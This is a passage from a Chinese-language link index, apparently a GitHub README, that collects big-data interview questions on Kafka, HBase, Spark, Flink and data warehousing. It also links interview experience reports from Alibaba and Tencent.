[Flume结构](https://github.com/MoRan1607/BigDataGuide/blob/master/Flume/%E9%9D%A2%E8%AF%95%E9%A2%98/Flume%E6%9E%B6%E6%9E%84/Flume%E6%9E%B6%E6%9E%84.md) #### 五、Kafka [介绍下Kafka,Kafka的作用?Kafka的组件?适用场景?](https://blog.csdn.net/qq_41544550/article/details/123534948) [Kafka实现高吞吐的原理?](https://github.com/MoRan1607/BigDataGuide/blob/master/Kafka/%E9%9D%A2%E8%AF%95%E9%A2%98/Kafka%E5%AE%9E%E7%8E%B0%E9%AB%98%E5%90%9E%E5%90%90%E7%9A%84%E5%8E%9F%E7%90%86.pdf) [Kafka的一条message中包含了哪些信息?](https://github.com/MoRan1607/BigDataGuide/blob/master/Kafka/%E9%9D%A2%E8%AF%95%E9%A2%98/Kafka%E7%9A%84%E4%B8%80%E6%9D%A1message%E4%B8%AD%E5%8C%85%E5%90%AB%E4%BA%86%E5%93%AA%E4%BA%9B%E4%BF%A1%E6%81%AF%EF%BC%9F.pdf) [Kafka的消费者和消费者组有什么区别?为什么需要消费者组?](https://github.com/MoRan1607/BigDataGuide/blob/master/Kafka/%E9%9D%A2%E8%AF%95%E9%A2%98/Kafka%E7%9A%84%E6%B6%88%E8%B4%B9%E8%80%85%E5%92%8C%E6%B6%88%E8%B4%B9%E8%80%85%E7%BB%84%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB%EF%BC%9F%E4%B8%BA%E4%BB%80%E4%B9%88%E9%9C%80%E8%A6%81%E6%B6%88%E8%B4%B9%E8%80%85%E7%BB%84%EF%BC%9F.pdf) [Kafka的ISR、OSR和ACK介绍,ACK分别有几种值?](https://github.com/MoRan1607/BigDataGuide/blob/master/Kafka/%E9%9D%A2%E8%AF%95%E9%A2%98/Kafka%E7%9A%84ISR%E3%80%81OSR%E5%92%8CACK%E4%BB%8B%E7%BB%8D%EF%BC%8CACK%E5%88%86%E5%88%AB%E6%9C%89%E5%87%A0%E7%A7%8D%E5%80%BC%EF%BC%9F.pdf) [Kafka怎么保证数据不丢失,不重复?](https://github.com/MoRan1607/BigDataGuide/blob/master/Kafka/%E9%9D%A2%E8%AF%95%E9%A2%98/Kafka%E6%80%8E%E4%B9%88%E4%BF%9D%E8%AF%81%E6%95%B0%E6%8D%AE%E4%B8%8D%E4%B8%A2%E5%A4%B1%EF%BC%8C%E4%B8%8D%E9%87%8D%E5%A4%8D%EF%BC%9F.pdf) [Kafka的单播和多播](https://github.com/MoRan1607/BigDataGuide/blob/master/Kafka/%E9%9D%A2%E8%AF%95%E9%A2%98/Kafka%E7%9A%84%E5%8D%95%E6%92%AD%E5%92%8C%E5%A4%9A%E6%92%AD.pdf) [说下Kafka的ISR机制](https://github.com/MoRan1607/BigDataGuide/blob/master/Kafka/%E9%9D%A2%E8%AF%95%E9%A2%98/%E8%AF%B4%E4%B8%8BKafka%E7%9A%84ISR%E6%9C%BA%E5%88%B6.pdf) #### 六、HBase [介绍下HBase架构](https://blog.csdn.net/qq_41544550/article/details/123583361) [HBase为什么查询快](https://github.com/MoRan1607/BigDataGuide/blob/master/HBase/%E9%9D%A2%E8%AF%95%E9%A2%98/HBase%E4%B8%BA%E4%BB%80%E4%B9%88%E6%9F%A5%E8%AF%A2%E5%BF%AB.pdf) [HBase的大合并、小合并是什么?](https://github.com/MoRan1607/BigDataGuide/blob/master/HBase/%E9%9D%A2%E8%AF%95%E9%A2%98/HBase%E7%9A%84%E5%A4%A7%E5%90%88%E5%B9%B6%E3%80%81%E5%B0%8F%E5%90%88%E5%B9%B6%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F.pdf) [HBase的rowkey设计原则](https://github.com/MoRan1607/BigDataGuide/blob/master/HBase/%E9%9D%A2%E8%AF%95%E9%A2%98/HBase%E7%9A%84rowkey%E8%AE%BE%E8%AE%A1%E5%8E%9F%E5%88%99.pdf) [HBase的一个region由哪些东西组成?](https://github.com/MoRan1607/BigDataGuide/blob/master/HBase/%E9%9D%A2%E8%AF%95%E9%A2%98/HBase%E7%9A%84%E4%B8%80%E4%B8%AAregion%E7%94%B1%E5%93%AA%E4%BA%9B%E4%B8%9C%E8%A5%BF%E7%BB%84%E6%88%90%EF%BC%9F.pdf) [HBase读写数据流程](https://github.com/MoRan1607/BigDataGuide/blob/master/HBase/%E9%9D%A2%E8%AF%95%E9%A2%98/HBase%E8%AF%BB%E5%86%99%E6%95%B0%E6%8D%AE%E6%B5%81%E7%A8%8B.pdf) [HBase的RegionServer宕机以后怎么恢复的?](https://github.com/MoRan1607/BigDataGuide/blob/master/HBase/%E9%9D%A2%E8%AF%95%E9%A2%98/HBase%E7%9A%84RegionServer%E5%AE%95%E6%9C%BA%E4%BB%A5%E5%90%8E%E6%80%8E%E4%B9%88%E6%81%A2%E5%A4%8D%E7%9A%84%EF%BC%9F.pdf) [HBase的读写缓存](https://github.com/MoRan1607/BigDataGuide/blob/master/HBase/%E9%9D%A2%E8%AF%95%E9%A2%98/HBase%E7%9A%84%E8%AF%BB%E5%86%99%E7%BC%93%E5%AD%98.pdf) #### 七、Spark 
[说下对RDD的理解?RDD特点、算子?](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/Spark%E9%9D%A2%E8%AF%95%E9%A2%98%E6%95%B4%E7%90%86/Spark/Pics/%E8%AF%B4%E4%B8%8B%E5%AF%B9RDD%E7%9A%84%E7%90%86%E8%A7%A3%EF%BC%9FRDD%E7%89%B9%E7%82%B9%E3%80%81%E7%AE%97%E5%AD%90/%E8%AF%B4%E4%B8%8B%E5%AF%B9RDD%E7%9A%84%E7%90%86%E8%A7%A3%EF%BC%9FRDD%E7%89%B9%E7%82%B9%E3%80%81%E7%AE%97%E5%AD%90.md) [Spark小文件问题](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/Spark%E9%9D%A2%E8%AF%95%E9%A2%98%E6%95%B4%E7%90%86/Spark/Spark%E5%B0%8F%E6%96%87%E4%BB%B6%E9%97%AE%E9%A2%98/Spark%E5%B0%8F%E6%96%87%E4%BB%B6%E9%97%AE%E9%A2%98.md) [Spark的内存模型](https://github.com/MoRan1607/BigDataGuide/blob/master/Spark/%E9%9D%A2%E8%AF%95%E9%A2%98/Spark%E7%9A%84%E5%86%85%E5%AD%98%E6%A8%A1%E5%9E%8B/Spark%E7%9A%84%E5%86%85%E5%AD%98%E6%A8%A1%E5%9E%8B.md) [Spark的Job、Stage、Task分别介绍下,如何划分?](https://github.com/MoRan1607/BigDataGuide/blob/master/Spark/%E9%9D%A2%E8%AF%95%E9%A2%98/Spark%E7%9A%84%E5%86%85%E5%AD%98%E6%A8%A1%E5%9E%8B/Spark%E7%9A%84Job%E3%80%81Stage%E3%80%81Task%E5%88%86%E5%88%AB%E4%BB%8B%E7%BB%8D%E4%B8%8B%EF%BC%8C%E5%A6%82%E4%BD%95%E5%88%92%E5%88%86.md) [Spark的RDD、DataFrame、DataSet、DataStream区别?](https://github.com/MoRan1607/BigDataGuide/blob/master/Spark/%E9%9D%A2%E8%AF%95%E9%A2%98/Spark%E7%9A%84%E5%86%85%E5%AD%98%E6%A8%A1%E5%9E%8B/Spark%E7%9A%84RDD%E3%80%81DataFrame%E3%80%81DataSet%E3%80%81DataStream%E5%8C%BA%E5%88%AB%EF%BC%9F.pdf) [RDD的容错](https://github.com/MoRan1607/BigDataGuide/blob/master/Spark/%E9%9D%A2%E8%AF%95%E9%A2%98/Spark%E7%9A%84%E5%86%85%E5%AD%98%E6%A8%A1%E5%9E%8B/RDD%E7%9A%84%E5%AE%B9%E9%94%99.pdf) [说下Spark中的Transform和Action,为什么Spark要把操作分为Transform和Action?](https://github.com/MoRan1607/BigDataGuide/blob/master/Spark/%E9%9D%A2%E8%AF%95%E9%A2%98/Spark%E7%9A%84%E5%86%85%E5%AD%98%E6%A8%A1%E5%9E%8B/%E8%AF%B4%E4%B8%8BSpark%E4%B8%AD%E7%9A%84Transform%E5%92%8CAction%EF%BC%8C%E4%B8%BA%E4%BB%80%E4%B9%88Spark%E8%A6%81%E6%8A%8A%E6%93%8D%E4%BD%9C%E5%88%86%E4%B8%BATransform%E5%92%8CAction%EF%BC%9F.pdf) [Spark的任务执行流程](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/Spark%E9%9D%A2%E8%AF%95%E9%A2%98%E6%95%B4%E7%90%86/Spark%E7%9A%84%E4%BB%BB%E5%8A%A1%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B.pdf) [Spark的架构](https://github.com/MoRan1607/BigDataGuide/blob/master/Spark/%E9%9D%A2%E8%AF%95%E9%A2%98/Spark%E7%9A%84%E6%9E%B6%E6%9E%84.pdf) #### 八、Flink [介绍下Flink](https://github.com/MoRan1607/BigDataGuide/blob/master/Flink/%E4%BB%8B%E7%BB%8D%E4%B8%8BFlink) [Flink架构](https://github.com/MoRan1607/BigDataGuide/blob/master/Flink/%E9%9D%A2%E8%AF%95%E9%A2%98/Flink%E6%9E%B6%E6%9E%84.pdf) #### 九、数仓面试题 [数据仓库和数据中台区别](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E6%95%B0%E4%BB%93/%E6%95%B0%E6%8D%AE%E4%BB%93%E5%BA%93%E5%92%8C%E6%95%B0%E6%8D%AE%E4%B8%AD%E5%8F%B0%E5%8C%BA%E5%88%AB.pdf) #### 十、综合面试题 [Spark和MapReduce之间的区别?各自优缺点?](https://github.com/MoRan1607/BigDataGuide/blob/master/Spark/%E9%9D%A2%E8%AF%95%E9%A2%98/Spark%E7%9A%84%E5%86%85%E5%AD%98%E6%A8%A1%E5%9E%8B/Spark%E5%92%8CMapReduce%E4%B9%8B%E9%97%B4%E7%9A%84%E5%8C%BA%E5%88%AB%EF%BC%9F%E5%90%84%E8%87%AA%E4%BC%98%E7%BC%BA%E7%82%B9%EF%BC%9F.pdf) [Spark和Flink的区别](https://github.com/MoRan1607/BigDataGuide/blob/master/Flink/%E9%9D%A2%E8%AF%95%E9%A2%98/Spark%E5%92%8CFlink%E7%9A%84%E5%8C%BA%E5%88%AB.pdf) 牛客网面经 --- ### 大数据面经 #### 阿里面经 [阿里巴巴 
二面凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C%E5%B7%B4%E5%B7%B4%20%E4%BA%8C%E9%9D%A2%E5%87%89%E7%BB%8F.pdf) [阿里云大数据平台三面+HR面【已OC】](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C%E4%BA%91%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%B9%B3%E5%8F%B0%E4%B8%89%E9%9D%A2%2BHR%E9%9D%A2%E3%80%90%E5%B7%B2OC%E3%80%91.pdf) [阿里-数据研发-1面2面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-%E6%95%B0%E6%8D%AE%E7%A0%94%E5%8F%91-1%E9%9D%A22%E9%9D%A2.pdf) [4.23阿里数开一面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/4.23%E9%98%BF%E9%87%8C%E6%95%B0%E5%BC%80%E4%B8%80%E9%9D%A2.pdf) [分享一个大数据的面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/%E5%88%86%E4%BA%AB%E4%B8%80%E4%B8%AA%E5%A4%A7%E6%95%B0%E6%8D%AE%E7%9A%84%E9%9D%A2%E7%BB%8F.pdf) [十余家公司大数据开发面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/%E5%8D%81%E4%BD%99%E5%AE%B6%E5%85%AC%E5%8F%B8%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E9%9D%A2%E7%BB%8F.pdf) [大数据面经好少啊,我来写点](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F%E5%A5%BD%E5%B0%91%E5%95%8A%EF%BC%8C%E6%88%91%E6%9D%A5%E5%86%99%E7%82%B9.pdf) [提前批面经(Java_大数据)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/%E6%8F%90%E5%89%8D%E6%89%B9%E9%9D%A2%E7%BB%8F(Java_%E5%A4%A7%E6%95%B0%E6%8D%AE).pdf) [阿里-数据技术与产品部(两次简历面)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/%E9%98%BF%E9%87%8C-%E6%95%B0%E6%8D%AE%E6%8A%80%E6%9C%AF%E4%B8%8E%E4%BA%A7%E5%93%81%E9%83%A8%EF%BC%88%E4%B8%A4%E6%AC%A1%E7%AE%80%E5%8E%86%E9%9D%A2%EF%BC%89.pdf) [阿里云一二三面凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/%E9%98%BF%E9%87%8C%E4%BA%91%E4%B8%80%E4%BA%8C%E4%B8%89%E9%9D%A2%E5%87%89%E7%BB%8F.pdf) [阿里巴巴淘系大数据研发工程师三面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/%E9%98%BF%E9%87%8C%E5%B7%B4%E5%B7%B4%E6%B7%98%E7%B3%BB%E5%A4%A7%E6%95%B0%E6%8D%AE%E7%A0%94%E5%8F%91%E5%B7%A5%E7%A8%8B%E5%B8%88%E4%B8%89%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) [阿里集团大淘宝一面凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/%E9%98%BF%E9%87%8C%E9%9B%86%E5%9B%A2%E5%A4%A7%E6%B7%98%E5%AE%9D%E4%B8%80%E9%9D%A2%E5%87%89%E7%BB%8F.pdf) [阿里巴巴 
二面凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C%E5%B7%B4%E5%B7%B4%20%E4%BA%8C%E9%9D%A2%E5%87%89%E7%BB%8F.pdf) #### 腾讯面经 [2022暑假实习 数据开发 字节 腾讯](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/2022%E6%9A%91%E5%81%87%E5%AE%9E%E4%B9%A0%20%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%20%E5%AD%97%E8%8A%82%20%E8%85%BE%E8%AE%AF%EF%BC%88%E5%B7%B2offer.pdf) [4.13 腾讯音乐数据工程笔试](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/4.13%20%E8%85%BE%E8%AE%AF%E9%9F%B3%E4%B9%90%E6%95%B0%E6%8D%AE%E5%B7%A5%E7%A8%8B%E7%AC%94%E8%AF%95.pdf) [2024届秋招总结](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/2024%E5%B1%8A%E7%A7%8B%E6%8B%9B%E6%80%BB%E7%BB%93.pdf) [5.30腾讯数据开发一面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/5.30%E8%85%BE%E8%AE%AF%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E4%B8%80%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) [9.20-腾讯云智-数据-二面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/9.20-%E8%85%BE%E8%AE%AF%E4%BA%91%E6%99%BA-%E6%95%B0%E6%8D%AE-%E4%BA%8C%E9%9D%A2.pdf) [【腾讯】后端开发暑期实习面经(已offer)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E3%80%90%E8%85%BE%E8%AE%AF%E3%80%91%E5%90%8E%E7%AB%AF%E5%BC%80%E5%8F%91%E6%9A%91%E6%9C%9F%E5%AE%9E%E4%B9%A0%E9%9D%A2%E7%BB%8F%EF%BC%88%E5%B7%B2offer%EF%BC%89.pdf) [一面凉经-腾讯技术研究-数据科学](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E4%B8%80%E9%9D%A2%E5%87%89%E7%BB%8F-%E8%85%BE%E8%AE%AF%E6%8A%80%E6%9C%AF%E7%A0%94%E7%A9%B6-%E6%95%B0%E6%8D%AE%E7%A7%91%E5%AD%A6.pdf) [大数据开发实习面经(阿里、360、腾讯)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%AE%9E%E4%B9%A0%E9%9D%A2%E7%BB%8F%EF%BC%88%E9%98%BF%E9%87%8C%E3%80%81360%E3%80%81%E8%85%BE%E8%AE%AF%EF%BC%89.pdf) [奇怪的csig数据工程timeline](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E5%A5%87%E6%80%AA%E7%9A%84csig%E6%95%B0%E6%8D%AE%E5%B7%A5%E7%A8%8Btimeline.pdf) 
[字节腾讯大数据凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E5%AD%97%E8%8A%82%E8%85%BE%E8%AE%AF%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%87%89%E7%BB%8F.pdf) [百度腾讯提前批阿里校招面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E7%99%BE%E5%BA%A6%E8%85%BE%E8%AE%AF%E6%8F%90%E5%89%8D%E6%89%B9%E9%98%BF%E9%87%8C%E6%A0%A1%E6%8B%9B%E9%9D%A2%E7%BB%8F.pdf) [腾讯 TEG 后台开发 大数据方向 一面总结](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%20TEG%20%E5%90%8E%E5%8F%B0%E5%BC%80%E5%8F%91%20%E5%A4%A7%E6%95%B0%E6%8D%AE%E6%96%B9%E5%90%91%20%E4%B8%80%E9%9D%A2%E6%80%BB%E7%BB%93.pdf) [腾讯 偏大数据开发三面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%20%E5%81%8F%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E4%B8%89%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) [腾讯 偏大数据开发二面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%20%E5%81%8F%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%20%E4%BA%8C%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) [腾讯 偏大数据开发一面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%20%E5%81%8F%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E4%B8%80%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) [腾讯 数据科学暑期实习 一面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%20%E6%95%B0%E6%8D%AE%E7%A7%91%E5%AD%A6%E6%9A%91%E6%9C%9F%E5%AE%9E%E4%B9%A0%20%E4%B8%80%E9%9D%A2.pdf) [腾讯-数据科学(IEG)+数据工程](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF-%E6%95%B0%E6%8D%AE%E7%A7%91%E5%AD%A6%EF%BC%88IEG%EF%BC%89%2B%E6%95%B0%E6%8D%AE%E5%B7%A5%E7%A8%8B.pdf) [腾讯CSIG后台开发一面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AFCSIG%E5%90%8E%E5%8F%B0%E5%BC%80%E5%8F%91%E4%B8%80%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) [腾讯CSIG大数据一面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AFCSIG%E5%A4%A7%E6%95%B0%E6%8D%AE%E4%B8%80%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) 
[腾讯IEG数据中心实习面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AFIEG%E6%95%B0%E6%8D%AE%E4%B8%AD%E5%BF%83%E5%AE%9E%E4%B9%A0%E9%9D%A2%E7%BB%8F.pdf) [腾讯PCG数据研发暑期实习一面凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AFPCG%E6%95%B0%E6%8D%AE%E7%A0%94%E5%8F%91%E6%9A%91%E6%9C%9F%E5%AE%9E%E4%B9%A0%E4%B8%80%E9%9D%A2%E5%87%89%E7%BB%8F.pdf) [腾讯TEG-数据平台部-大数据开发实习-一面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AFTEG-%E6%95%B0%E6%8D%AE%E5%B9%B3%E5%8F%B0%E9%83%A8-%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%AE%9E%E4%B9%A0-%E4%B8%80%E9%9D%A2.pdf) 